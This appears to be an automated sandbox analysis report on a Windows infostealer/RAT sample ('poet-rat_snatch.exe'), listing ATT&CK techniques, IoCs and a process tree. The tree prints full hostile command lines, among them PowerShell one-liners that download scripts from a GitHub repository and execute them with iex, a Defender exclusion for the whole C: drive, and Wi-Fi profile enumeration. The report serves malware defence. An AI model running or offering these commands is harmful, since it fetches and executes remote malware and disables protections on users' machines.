5bb944987ea6fa80d95164cce3351e322816674075fd9c978b5d170e8df8b7c4

Analysis

max time kernel
137s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 03:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
Size

14.0MB
MD5

0d764aa58a2696667e32c13013efbc4c
SHA1

726c24532981b7d0f024e777fdf3f8666f48747b
SHA256

5bb944987ea6fa80d95164cce3351e322816674075fd9c978b5d170e8df8b7c4
SHA512

0459c87ad759022df0861934c67e4a960f379282bee10d42be02ddb3f4119275244fa4f23ebbf67a0a669c6b4d38e3dc7c222cf1f3882b84da9f5f59897fdc28
SSDEEP

196608:EzJfx6npoOG6esw8VcejaO779PVJUW9ydW:EZxTOG61w8meWmU

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vboxmouse.sys	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	3476	powershell.exe
16	3324	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4176	PowerShell.exe
3324	powershell.exe
3476	powershell.exe
3980	powershell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vmmemctl.sys	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4680	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3680	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4060	netsh.exe
4032	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4916	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
640	ipconfig.exe
4916	NETSTAT.EXE
3052	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4044	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3476	powershell.exe
3980	powershell.exe
4176	PowerShell.exe
3324	powershell.exe
4176	PowerShell.exe
3476	powershell.exe
3980	powershell.exe
3324	powershell.exe
3324	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	4176	PowerShell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	4044	taskkill.exe
Token: 33	2608	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2608	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe
Token: SeUndockPrivilege	3324	powershell.exe
Token: SeManageVolumePrivilege	3324	powershell.exe
Token: 33	3324	powershell.exe
Token: 34	3324	powershell.exe
Token: 35	3324	powershell.exe
Token: 36	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	3324	powershell.exe
Token: SeSecurityPrivilege	3324	powershell.exe
Token: SeTakeOwnershipPrivilege	3324	powershell.exe
Token: SeLoadDriverPrivilege	3324	powershell.exe
Token: SeSystemProfilePrivilege	3324	powershell.exe
Token: SeSystemtimePrivilege	3324	powershell.exe
Token: SeProfSingleProcessPrivilege	3324	powershell.exe
Token: SeIncBasePriorityPrivilege	3324	powershell.exe
Token: SeCreatePagefilePrivilege	3324	powershell.exe
Token: SeBackupPrivilege	3324	powershell.exe
Token: SeRestorePrivilege	3324	powershell.exe
Token: SeShutdownPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeSystemEnvironmentPrivilege	3324	powershell.exe
Token: SeRemoteShutdownPrivilege	3324	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 928 wrote to memory of 3324	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	85
PID 928 wrote to memory of 3324	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	85
PID 928 wrote to memory of 3476	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	87
PID 928 wrote to memory of 3476	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	87
PID 928 wrote to memory of 4596	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	88
PID 928 wrote to memory of 4596	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	88
PID 928 wrote to memory of 3980	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	89
PID 928 wrote to memory of 3980	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	89
PID 928 wrote to memory of 4176	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	90
PID 928 wrote to memory of 4176	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	90
PID 928 wrote to memory of 628	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	91
PID 928 wrote to memory of 628	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	91
PID 928 wrote to memory of 4812	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	92
PID 928 wrote to memory of 4812	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	92
PID 4812 wrote to memory of 2360	4812	cmd.exe	93
PID 4812 wrote to memory of 2360	4812	cmd.exe	93
PID 3476 wrote to memory of 1904	3476	powershell.exe	94
PID 3476 wrote to memory of 1904	3476	powershell.exe	94
PID 3324 wrote to memory of 4312	3324	powershell.exe	95
PID 3324 wrote to memory of 4312	3324	powershell.exe	95
PID 1904 wrote to memory of 4956	1904	csc.exe	96
PID 1904 wrote to memory of 4956	1904	csc.exe	96
PID 4312 wrote to memory of 4320	4312	csc.exe	97
PID 4312 wrote to memory of 4320	4312	csc.exe	97
PID 928 wrote to memory of 4044	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	99
PID 928 wrote to memory of 4044	928	2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe	99
PID 3324 wrote to memory of 4060	3324	powershell.exe	104
PID 3324 wrote to memory of 4060	3324	powershell.exe	104
PID 3324 wrote to memory of 4948	3324	powershell.exe	105
PID 3324 wrote to memory of 4948	3324	powershell.exe	105
PID 4948 wrote to memory of 2008	4948	net.exe	106
PID 4948 wrote to memory of 2008	4948	net.exe	106
PID 3324 wrote to memory of 4680	3324	powershell.exe	107
PID 3324 wrote to memory of 4680	3324	powershell.exe	107
PID 3324 wrote to memory of 4324	3324	powershell.exe	108
PID 3324 wrote to memory of 4324	3324	powershell.exe	108
PID 3324 wrote to memory of 512	3324	powershell.exe	109
PID 3324 wrote to memory of 512	3324	powershell.exe	109
PID 512 wrote to memory of 320	512	net.exe	110
PID 512 wrote to memory of 320	512	net.exe	110
PID 3324 wrote to memory of 640	3324	powershell.exe	113
PID 3324 wrote to memory of 640	3324	powershell.exe	113
PID 3324 wrote to memory of 1792	3324	powershell.exe	114
PID 3324 wrote to memory of 1792	3324	powershell.exe	114
PID 1792 wrote to memory of 3800	1792	net.exe	115
PID 1792 wrote to memory of 3800	1792	net.exe	115
PID 3324 wrote to memory of 4188	3324	powershell.exe	116
PID 3324 wrote to memory of 4188	3324	powershell.exe	116
PID 3324 wrote to memory of 4916	3324	powershell.exe	117
PID 3324 wrote to memory of 4916	3324	powershell.exe	117
PID 3324 wrote to memory of 5016	3324	powershell.exe	118
PID 3324 wrote to memory of 5016	3324	powershell.exe	118
PID 3324 wrote to memory of 3052	3324	powershell.exe	119
PID 3324 wrote to memory of 3052	3324	powershell.exe	119
PID 3324 wrote to memory of 3884	3324	powershell.exe	120
PID 3324 wrote to memory of 3884	3324	powershell.exe	120
PID 3324 wrote to memory of 3680	3324	powershell.exe	121
PID 3324 wrote to memory of 3680	3324	powershell.exe	121
PID 3324 wrote to memory of 4032	3324	powershell.exe	122
PID 3324 wrote to memory of 4032	3324	powershell.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
628	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_0d764aa58a2696667e32c13013efbc4c_poet-rat_snatch.exe"
1⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3324
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2fhsgo2\m2fhsgo2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\m2fhsgo2\CSCC001113B445E4201B2C5ACFDA97752E2.TMP"
      4⤵
      PID:4320
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4060
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2008
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4680
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4324
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:320
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:640
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:3800
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4188
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:5016
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3052
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3884
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:3680
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n1ljwtqc\n1ljwtqc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1904
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp" "c:\Users\Admin\AppData\Local\Temp\n1ljwtqc\CSC62B24FB44F824CC49CFE77938B4E5798.TMP"
      4⤵
      PID:4956
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:4596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4176
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:628
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:2360
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4044

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x514
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

